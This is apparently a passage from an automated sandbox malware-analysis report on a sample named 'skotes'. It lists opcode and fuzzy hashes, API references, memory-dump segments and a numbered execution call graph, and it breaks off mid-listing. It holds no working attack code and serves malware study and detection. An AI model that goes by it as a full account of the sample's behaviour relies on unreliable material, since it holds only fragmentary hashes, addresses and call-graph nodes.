                                                                                                                                                                                                                                                                • API String ID: 3390424672-2046700901
                                                                                                                                                                                                                                                                • Opcode ID: f3d023e9fb813f982fb10de47a2ead2843f401719477998bb41b2c16d2d896c9
                                                                                                                                                                                                                                                                • Instruction ID: a00b8f17c80d00dd798df0cd5767ed2e217b70322c291ff90bfd7d44cddf92c8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f3d023e9fb813f982fb10de47a2ead2843f401719477998bb41b2c16d2d896c9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4811D636A00214BBCB15FF58C5859AD77AAAF84360B158066E91397362DB74DD02CFD0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 00ACB94E
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00ACB961
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                • String ID: pContext
                                                                                                                                                                                                                                                                • API String ID: 548886458-2046700901
                                                                                                                                                                                                                                                                • Opcode ID: 1b281c526b9b117a681448e6ec9e3489a13aa3567c0829d799c9419420ace566
                                                                                                                                                                                                                                                                • Instruction ID: 9136471fd04952a00fede5812e1ef8dc028cc916ad4e024060e906be30320789
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b281c526b9b117a681448e6ec9e3489a13aa3567c0829d799c9419420ace566
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDE09B39B0010867CB04F7A5D945CADB7795E847207058116F611A3351DB709905C9D1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AC34FC
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                • String ID: pScheduler$version
                                                                                                                                                                                                                                                                • API String ID: 2141394445-3154422776
                                                                                                                                                                                                                                                                • Opcode ID: fd18ff06fae27f3701a70333096d980e2f2b98f4512f58412036a37f00084f8f
                                                                                                                                                                                                                                                                • Instruction ID: 7c642b27b43c731ee48d2b86d50a8a7c6f93346a359ff4225a1b1a0cc1d5f7e0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd18ff06fae27f3701a70333096d980e2f2b98f4512f58412036a37f00084f8f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51E0863594020CF6CF29FB94DA47FDC7768AB1474AF04C52AB91111091DBB49788CAC1

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:2.5%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                Signature Coverage:3.7%
                                                                                                                                                                                                                                                                Total number of Nodes:1680
                                                                                                                                                                                                                                                                Total number of Limit Nodes:53
                                                                                                                                                                                                                                                                execution_graph 93664 67dee5 93667 67b710 93664->93667 93668 67b72b 93667->93668 93669 6c00f8 93668->93669 93670 6c0146 93668->93670 93691 67b750 93668->93691 93673 6c0102 93669->93673 93675 6c010f 93669->93675 93669->93691 93733 6f58a2 348 API calls 2 library calls 93670->93733 93731 6f5d33 348 API calls 93673->93731 93690 67ba20 93675->93690 93732 6f61d0 348 API calls 2 library calls 93675->93732 93680 67bbe0 40 API calls 93680->93691 93681 6c03d9 93681->93681 93682 68d336 40 API calls 93682->93691 93684 67ba4e 93686 6c0322 93746 6f5c0c 82 API calls 93686->93746 93690->93684 93747 6e359c 82 API calls __wsopen_s 93690->93747 93691->93680 93691->93682 93691->93684 93691->93686 93691->93690 93698 67ec40 93691->93698 93722 67a81b 41 API calls 93691->93722 93723 68d2f0 40 API calls 93691->93723 93724 68a01b 348 API calls 93691->93724 93725 690242 5 API calls __Init_thread_wait 93691->93725 93726 68edcd 22 API calls 93691->93726 93727 6900a3 29 API calls __onexit 93691->93727 93728 6901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93691->93728 93729 68ee53 82 API calls 93691->93729 93730 68e5ca 348 API calls 93691->93730 93734 67aceb 93691->93734 93744 6cf6bf 23 API calls 93691->93744 93745 67a8c7 22 API calls __fread_nolock 93691->93745 93718 67ec76 ISource 93698->93718 93699 6901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 93699->93718 93701 67fef7 93716 67ed9d ISource 93701->93716 93811 67a8c7 22 API calls __fread_nolock 93701->93811 93703 68fddb 22 API calls 93703->93718 93704 67f3ae ISource 93704->93716 93812 6e359c 82 API calls __wsopen_s 93704->93812 93705 6c4600 93705->93716 93810 67a8c7 22 API calls __fread_nolock 93705->93810 93706 6c4b0b 93813 6e359c 82 API calls __wsopen_s 93706->93813 93710 67a8c7 22 API calls 93710->93718 93713 690242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 93713->93718 93714 67fbe3 93714->93704 93714->93716 93717 6c4bdc 93714->93717 93715 67a961 22 API calls 93715->93718 93716->93691 93814 6e359c 82 API calls __wsopen_s 93717->93814 93718->93699 93718->93701 93718->93703 93718->93704 93718->93705 93718->93706 93718->93710 93718->93713 93718->93714 93718->93715 93718->93716 93719 6900a3 29 API calls pre_c_initialization 93718->93719 93721 6c4beb 93718->93721 93748 6801e0 93718->93748 93809 6806a0 41 API calls ISource 93718->93809 93719->93718 93815 6e359c 82 API calls __wsopen_s 93721->93815 93722->93691 93723->93691 93724->93691 93725->93691 93726->93691 93727->93691 93728->93691 93729->93691 93730->93691 93731->93675 93732->93690 93733->93691 93735 67acf9 93734->93735 93743 67ad2a ISource 93734->93743 93736 67ad55 93735->93736 93737 67ad01 ISource 93735->93737 93736->93743 94313 67a8c7 22 API calls __fread_nolock 93736->94313 93739 6bfa48 93737->93739 93740 67ad21 93737->93740 93737->93743 93739->93743 94314 68ce17 22 API calls ISource 93739->94314 93741 6bfa3a VariantClear 93740->93741 93740->93743 93741->93743 93743->93691 93744->93691 93745->93691 93746->93690 93747->93681 93749 680206 93748->93749 93766 68027e 93748->93766 93750 6c5411 93749->93750 93751 680213 93749->93751 93889 6f7b7e 348 API calls 2 library calls 93750->93889 93758 6c5435 93751->93758 93761 68021d 93751->93761 93752 6c5405 93888 6e359c 82 API calls __wsopen_s 93752->93888 93754 6c5466 93759 6c5471 93754->93759 93760 6c5493 93754->93760 93755 67ec40 348 API calls 93755->93766 93758->93754 93765 6c544d 93758->93765 93891 6f7b7e 348 API calls 2 library calls 93759->93891 93816 6f5689 93760->93816 93808 680230 ISource 93761->93808 93952 67a8c7 22 API calls __fread_nolock 93761->93952 93764 680405 93764->93718 93890 6e359c 82 API calls __wsopen_s 93765->93890 93766->93755 93766->93764 93773 6c51b9 93766->93773 93784 6803f9 93766->93784 93789 6c51ce ISource 93766->93789 93790 680344 93766->93790 93802 6803b2 ISource 93766->93802 93768 6c568a 93776 6c56c0 93768->93776 93977 6f7771 67 API calls 93768->93977 93771 6c5332 93771->93808 93887 67a8c7 22 API calls __fread_nolock 93771->93887 93884 6e359c 82 API calls __wsopen_s 93773->93884 93775 6c5532 93892 6e1119 22 API calls 93775->93892 93781 67aceb 23 API calls 93776->93781 93778 6c5668 93954 677510 93778->93954 93804 680273 ISource 93781->93804 93783 6c569e 93786 677510 53 API calls 93783->93786 93784->93764 93883 6e359c 82 API calls __wsopen_s 93784->93883 93785 6c54b9 93823 6e0acc 93785->93823 93801 6c56a6 _wcslen 93786->93801 93789->93802 93789->93804 93885 6e359c 82 API calls __wsopen_s 93789->93885 93790->93784 93882 6804f0 22 API calls 93790->93882 93792 6c5544 93893 67a673 22 API calls 93792->93893 93793 6803a5 93793->93784 93793->93802 93796 6c5670 _wcslen 93796->93768 93799 67aceb 23 API calls 93796->93799 93798 6c554d 93805 6e0acc 22 API calls 93798->93805 93799->93768 93801->93776 93803 67aceb 23 API calls 93801->93803 93802->93752 93802->93771 93802->93804 93802->93808 93886 68a308 348 API calls 93802->93886 93803->93776 93804->93718 93806 6c5566 93805->93806 93894 67bf40 93806->93894 93808->93768 93808->93804 93953 6f7632 54 API calls __wsopen_s 93808->93953 93809->93718 93810->93716 93811->93716 93812->93716 93813->93716 93814->93721 93815->93716 93817 6f56a4 93816->93817 93822 6c549e 93816->93822 93978 68fe0b 93817->93978 93820 6f56c6 93820->93822 93988 68fddb 93820->93988 93998 6e0a59 22 API calls 93820->93998 93822->93775 93822->93785 93824 6c54e3 93823->93824 93825 6e0ada 93823->93825 93827 681310 93824->93827 93825->93824 93826 68fddb 22 API calls 93825->93826 93826->93824 93828 6817b0 93827->93828 93829 681376 93827->93829 94053 690242 5 API calls __Init_thread_wait 93828->94053 93831 681390 93829->93831 93832 6c6331 93829->93832 94014 681940 93831->94014 94063 6f709c 348 API calls 93832->94063 93834 6817ba 93837 6817fb 93834->93837 94054 679cb3 93834->94054 93836 6c633d 93836->93808 93843 6c6346 93837->93843 93844 68182c 93837->93844 93840 681940 9 API calls 93841 6813b6 93840->93841 93841->93837 93842 6813ec 93841->93842 93842->93843 93869 681408 __fread_nolock 93842->93869 94064 6e359c 82 API calls __wsopen_s 93843->94064 93845 67aceb 23 API calls 93844->93845 93847 681839 93845->93847 94061 68d217 348 API calls 93847->94061 93848 6817d4 94060 6901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93848->94060 93851 6c636e 94065 6e359c 82 API calls __wsopen_s 93851->94065 93852 68152f 93854 68153c 93852->93854 93855 6c63d1 93852->93855 93857 681940 9 API calls 93854->93857 94067 6f5745 54 API calls _wcslen 93855->94067 93859 681549 93857->93859 93858 68fddb 22 API calls 93858->93869 93862 681940 9 API calls 93859->93862 93867 6815c7 ISource 93859->93867 93860 681872 94062 68faeb 23 API calls 93860->94062 93861 68fe0b 22 API calls 93861->93869 93865 681563 93862->93865 93863 68171d 93863->93808 93865->93867 94068 67a8c7 22 API calls __fread_nolock 93865->94068 93867->93860 93870 68167b ISource 93867->93870 93873 681940 9 API calls 93867->93873 94024 6e5c5a 93867->94024 94029 68f645 93867->94029 94036 701591 93867->94036 94039 6fabf7 93867->94039 94044 6fa2ea 93867->94044 94049 6fab67 93867->94049 94069 6e359c 82 API calls __wsopen_s 93867->94069 93868 67ec40 348 API calls 93868->93869 93869->93847 93869->93851 93869->93852 93869->93858 93869->93861 93869->93867 93869->93868 93871 6c63b2 93869->93871 93870->93863 94052 68ce17 22 API calls ISource 93870->94052 94066 6e359c 82 API calls __wsopen_s 93871->94066 93873->93867 93882->93793 93883->93804 93884->93789 93885->93802 93886->93802 93887->93808 93888->93750 93889->93808 93890->93804 93891->93808 93892->93792 93893->93798 94262 67adf0 93894->94262 93896 67bf9d 93897 6c04b6 93896->93897 93898 67bfa9 93896->93898 94280 6e359c 82 API calls __wsopen_s 93897->94280 93900 6c04c6 93898->93900 93901 67c01e 93898->93901 94281 6e359c 82 API calls __wsopen_s 93900->94281 94267 67ac91 93901->94267 93904 67c7da 93909 68fe0b 22 API calls 93904->93909 93906 6d7120 22 API calls 93946 67c039 ISource __fread_nolock 93906->93946 93914 67c808 __fread_nolock 93909->93914 93912 6c04f5 93915 6c055a 93912->93915 94282 68d217 348 API calls 93912->94282 93918 68fe0b 22 API calls 93914->93918 93951 67c603 93915->93951 94283 6e359c 82 API calls __wsopen_s 93915->94283 93916 67ec40 348 API calls 93916->93946 93917 6c091a 94292 6e3209 23 API calls 93917->94292 93939 67c350 ISource __fread_nolock 93918->93939 93919 67af8a 22 API calls 93919->93946 93922 6c08a5 93923 67ec40 348 API calls 93922->93923 93925 6c08cf 93923->93925 93925->93951 94290 67a81b 41 API calls 93925->94290 93926 6c0591 94284 6e359c 82 API calls __wsopen_s 93926->94284 93927 6c08f6 94291 6e359c 82 API calls __wsopen_s 93927->94291 93931 67bbe0 40 API calls 93931->93946 93933 67c3ac 93933->93808 93934 67c237 93936 67c253 93934->93936 94293 67a8c7 22 API calls __fread_nolock 93934->94293 93935 67aceb 23 API calls 93935->93946 93940 6c0976 93936->93940 93945 67c297 ISource 93936->93945 93938 68fe0b 22 API calls 93938->93946 93939->93933 94279 68ce17 22 API calls ISource 93939->94279 93943 67aceb 23 API calls 93940->93943 93941 68fddb 22 API calls 93941->93946 93944 6c09bf 93943->93944 93944->93951 94294 6e359c 82 API calls __wsopen_s 93944->94294 93945->93944 93947 67aceb 23 API calls 93945->93947 93946->93904 93946->93906 93946->93912 93946->93914 93946->93915 93946->93916 93946->93917 93946->93919 93946->93922 93946->93926 93946->93927 93946->93931 93946->93934 93946->93935 93946->93938 93946->93941 93946->93944 93946->93951 94271 67ad81 93946->94271 94285 6d7099 22 API calls __fread_nolock 93946->94285 94286 6f5745 54 API calls _wcslen 93946->94286 94287 68aa42 22 API calls ISource 93946->94287 94288 6df05c 40 API calls 93946->94288 94289 67a993 41 API calls 93946->94289 93948 67c335 93947->93948 93948->93944 93949 67c342 93948->93949 94278 67a704 22 API calls ISource 93949->94278 93951->93808 93952->93808 93953->93778 93955 677525 93954->93955 93956 677522 93954->93956 93957 67752d 93955->93957 93958 67755b 93955->93958 93956->93796 94309 6951c6 26 API calls 93957->94309 93959 6b50f6 93958->93959 93961 67756d 93958->93961 93968 6b500f 93958->93968 94312 695183 26 API calls 93959->94312 94310 68fb21 51 API calls 93961->94310 93962 67753d 93967 68fddb 22 API calls 93962->93967 93965 6b510e 93965->93965 93969 677547 93967->93969 93971 68fe0b 22 API calls 93968->93971 93976 6b5088 93968->93976 93970 679cb3 22 API calls 93969->93970 93970->93956 93972 6b5058 93971->93972 93973 68fddb 22 API calls 93972->93973 93974 6b507f 93973->93974 93975 679cb3 22 API calls 93974->93975 93975->93976 94311 68fb21 51 API calls 93976->94311 93977->93783 93981 68fddb 93978->93981 93980 68fdfa 93980->93820 93981->93980 93984 68fdfc 93981->93984 93999 69ea0c 93981->93999 94006 694ead 7 API calls 2 library calls 93981->94006 93983 69066d 94008 6932a4 RaiseException 93983->94008 93984->93983 94007 6932a4 RaiseException 93984->94007 93987 69068a 93987->93820 93991 68fde0 93988->93991 93989 69ea0c ___std_exception_copy 21 API calls 93989->93991 93990 68fdfa 93990->93820 93991->93989 93991->93990 93994 68fdfc 93991->93994 94011 694ead 7 API calls 2 library calls 93991->94011 93993 69066d 94013 6932a4 RaiseException 93993->94013 93994->93993 94012 6932a4 RaiseException 93994->94012 93997 69068a 93997->93820 93998->93820 94004 6a3820 __dosmaperr 93999->94004 94000 6a385e 94010 69f2d9 20 API calls __dosmaperr 94000->94010 94001 6a3849 RtlAllocateHeap 94003 6a385c 94001->94003 94001->94004 94003->93981 94004->94000 94004->94001 94009 694ead 7 API calls 2 library calls 94004->94009 94006->93981 94007->93983 94008->93987 94009->94004 94010->94003 94011->93991 94012->93993 94013->93997 94015 68195d 94014->94015 94016 681981 94014->94016 94023 6813a0 94015->94023 94072 690242 5 API calls __Init_thread_wait 94015->94072 94070 690242 5 API calls __Init_thread_wait 94016->94070 94019 68198b 94019->94015 94071 6901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94019->94071 94020 688727 94020->94023 94073 6901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94020->94073 94023->93840 94025 677510 53 API calls 94024->94025 94026 6e5c6d 94025->94026 94074 6ddbbe lstrlenW 94026->94074 94028 6e5c77 94028->93867 94079 67b567 94029->94079 94031 68f659 94032 6cf2dc Sleep 94031->94032 94033 68f661 timeGetTime 94031->94033 94034 67b567 39 API calls 94033->94034 94035 68f677 94034->94035 94035->93867 94085 702ad8 94036->94085 94038 70159f 94038->93867 94119 6faff9 94039->94119 94041 6fac54 94041->93867 94042 6fac0c 94042->94041 94043 67aceb 23 API calls 94042->94043 94043->94041 94045 677510 53 API calls 94044->94045 94046 6fa306 94045->94046 94241 6dd4dc CreateToolhelp32Snapshot Process32FirstW 94046->94241 94048 6fa315 94048->93867 94050 6faff9 217 API calls 94049->94050 94051 6fab79 94050->94051 94051->93867 94052->93870 94053->93834 94055 679cc2 _wcslen 94054->94055 94056 68fe0b 22 API calls 94055->94056 94057 679cea __fread_nolock 94056->94057 94058 68fddb 22 API calls 94057->94058 94059 679d00 94058->94059 94059->93848 94060->93837 94061->93860 94062->93860 94063->93836 94064->93867 94065->93867 94066->93867 94067->93865 94068->93867 94069->93867 94070->94019 94071->94015 94072->94020 94073->94023 94075 6ddbdc GetFileAttributesW 94074->94075 94076 6ddc06 94074->94076 94075->94076 94077 6ddbe8 FindFirstFileW 94075->94077 94076->94028 94077->94076 94078 6ddbf9 FindClose 94077->94078 94078->94076 94080 67b57f 94079->94080 94081 67b578 94079->94081 94080->94031 94081->94080 94084 6962d1 39 API calls 94081->94084 94083 67b5c2 94083->94031 94084->94083 94086 67aceb 23 API calls 94085->94086 94087 702af3 94086->94087 94088 702b1d 94087->94088 94089 702aff 94087->94089 94096 676b57 94088->94096 94090 677510 53 API calls 94089->94090 94093 702b0c 94090->94093 94092 702b1b 94092->94038 94093->94092 94095 67a8c7 22 API calls __fread_nolock 94093->94095 94095->94092 94097 676b67 _wcslen 94096->94097 94098 6b4ba1 94096->94098 94101 676ba2 94097->94101 94102 676b7d 94097->94102 94109 6793b2 94098->94109 94100 6b4baa 94100->94100 94103 68fddb 22 